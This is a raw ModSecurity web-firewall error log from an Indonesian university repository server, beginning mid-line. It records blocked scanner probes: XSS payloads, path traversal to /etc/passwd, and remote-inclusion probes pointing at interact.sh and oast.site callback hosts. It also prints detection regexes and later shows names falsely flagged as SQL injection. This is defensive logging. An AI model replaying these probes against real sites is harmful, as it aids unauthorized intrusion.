"repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16o8Co-f0AAAqqtqcAAAAA"]
[Tue Aug 29 11:57:08.665298 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:jlbqg<script>alert("2Ue0JN1IxddkeI1vtwf86k4xLF5")</script>b7g0x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: jlbqg<script found within ARGS_NAMES:jlbqg<script>alert(\\x222Ue0JN1IxddkeI1vtwf86k4xLF5\\x22)</script>b7g0x: jlbqg<script>alert(\\x222Ue0JN1IxddkeI1vtwf86k4xLF5\\x22)</script>b7g0x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO16pMCo-f0AAArB2BIAAAAV"]
[Tue Aug 29 11:57:08.709096 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16pMCo-f0AAAq-HqEAAAAT"]
[Tue Aug 29 11:57:11.811968 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:foodbakery_radius. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:foodbakery_radius: 10\\x22</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/listings/"] [unique_id "ZO16p8Co-f0AAAq5@fsAAAAK"]
[Tue Aug 29 11:57:12.235391 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:node_iconfilename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --NONE- found within ARGS:node_iconfilename: --NONE--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/plugins/weathermap/editor.php"] [unique_id "ZO16qMCo-f0AAAnEqaAAAAAO"]
[Tue Aug 29 11:57:18.676394 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:WaitDuration. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:WaitDuration: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/ProcessWait.aspx"] [unique_id "ZO16rsCo-f0AAArbWYcAAAAG"]
[Tue Aug 29 11:57:18.796019 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmnijtjmimvgniikdb09heqc4gqbmf3u.oast.site found within TX:1: cjmnijtjmimvgniikdb09heqc4gqbmf3u.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/qards/html2canvasproxy.php"] [unique_id "ZO16rsCo-f0AAArLLhgAAAAb"]
[Tue Aug 29 11:57:19.576623 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:POBatch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:POBatch: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/ProcessWait.aspx"] [unique_id "ZO16r8Co-f0AAAocypoAAAAR"]
[Tue Aug 29 11:57:23.555057 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/>< found within ARGS:type: \\x22/><svg/onload=\\x22alert(document.domain)\\x22/>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/badging/badge_template_v0.php"] [unique_id "ZO16s8Co-f0AAAm80asAAAAF"]
[Tue Aug 29 11:57:26.235337 2023] [:error] [pid 2784] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:appservlang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:appservlang: <svg/onload=confirm('xss')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16tsCo-f0AAArgDwMAAAAE"]
[Tue Aug 29 11:57:26.244713 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../ found within ARGS:file: /themes/../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/includes/lib/gz.php"] [unique_id "ZO16tsCo-f0AAAm80boAAAAF"]
[Tue Aug 29 11:57:27.613436 2023] [:error] [pid 2782] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:swfloc. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:swfloc: \\x22><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php"] [unique_id "ZO16t8Co-f0AAArePLsAAAAJ"]
[Tue Aug 29 11:57:30.593403 2023] [:error] [pid 2785] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:items[ITEMS][ID]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22/*\\x22>*/)}); found within ARGS:items[ITEMS][ID]: <a href=\\x22/*\\x22>*/)});function __MobileAppList(){alert(1)}//>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/bitrix/components/bitrix/mobileapp.list/ajax.php/"] [unique_id "ZO16usCo-f0AAArh0UYAAAAC"]
[Tue Aug 29 11:57:30.672343 2023] [:error] [pid 2782] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://\\x0a found within ARGS:url: javascript://\\x0aalert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/adm_program/system/redirect.php"] [unique_id "ZO16usCo-f0AAArePNQAAAAJ"]
[Tue Aug 29 11:57:30.727928 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:listing_list_view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:listing_list_view: standard13\\x22</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/listing/"] [unique_id "ZO16usCo-f0AAAoz8h0AAAAS"]
[Tue Aug 29 11:57:31.535234 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:items[ITEMS][ID]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22//\\x0d\\x0a);//\\x22\\x22>< found within ARGS:items[ITEMS][ID]: <img src=\\x22//\\x0d\\x0a);//\\x22\\x22><div>x\\x0d\\x0a});var BX = window.BX;window.BX = function(node, bCache){};BX.ready = function(handler){};function __MobileAppList(test){alert(document.domain);};//</div>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/bitrix/components/bitrix/mobileapp.list/ajax.php/"] [unique_id "ZO16u8Co-f0AAArLLlIAAAAb"]
[Tue Aug 29 11:57:33.532805 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16vcCo-f0AAArLLl0AAAAb"]
[Tue Aug 29 11:57:33.675927 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/ccmadmin/bulkvivewfilecontents.do"] [unique_id "ZO16vcCo-f0AAAocyvEAAAAR"]
[Mon Aug 28 06:43:39.078937 2023] [:error] [pid 37416] [client 47.128.17.60] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Hennie Husniah\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvfq8Co-f0AAJIoZRMAAAAR"]
[Mon Aug 28 06:49:08.571739 2023] [:error] [pid 37420] [client 47.128.31.119] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22lease contract\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvg9MCo-f0AAJIsPkcAAAAV"]
[Mon Aug 28 06:58:48.704906 2023] [:error] [pid 37416] [client 47.128.19.155] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Budi Mas Susilo\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvjOMCo-f0AAJIoa9oAAAAR"]
[Mon Aug 28 07:04:42.089071 2023] [:error] [pid 37416] [client 47.128.19.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Ardiyan Dwi Cahyono\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvkmsCo-f0AAJIoa@oAAAAR"]
[Mon Aug 28 07:07:14.180876 2023] [:error] [pid 37416] [client 47.128.28.2] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Fazilah  Abdul Aziz\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvlMsCo-f0AAJIobAkAAAAR"]
[Mon Aug 28 07:10:51.505617 2023] [:error] [pid 37574] [client 47.128.17.137] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Tebal lapis tambah\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvmC8Co-f0AAJLG-e8AAAAI"]
[Mon Aug 28 07:18:34.099953 2023] [:error] [pid 37758] [client 47.128.23.41] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Zaka Abdurrozak\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvn2sCo-f0AAJN@73MAAAAE"]
[Mon Aug 28 07:19:28.196954 2023] [:error] [pid 37451] [client 47.128.20.135] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Hotel  resort\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvoEMCo-f0AAJJLqhgAAAAA"]
[Mon Aug 28 07:20:17.444880 2023] [:error] [pid 37619] [client 47.128.30.75] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Rohmana\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvoQcCo-f0AAJLzWZ8AAAAC"]
[Mon Aug 28 07:21:41.196271 2023] [:error] [pid 37312] [client 47.128.19.221] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Davidescu C. Victoria\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvolcCo-f0AAJHAlNIAAAAY"]
[Mon Aug 28 07:22:02.817503 2023] [:error] [pid 37539] [client 47.128.22.86] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Nuzul Ramdani\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvoqsCo-f0AAJKjZcYAAAAG"]
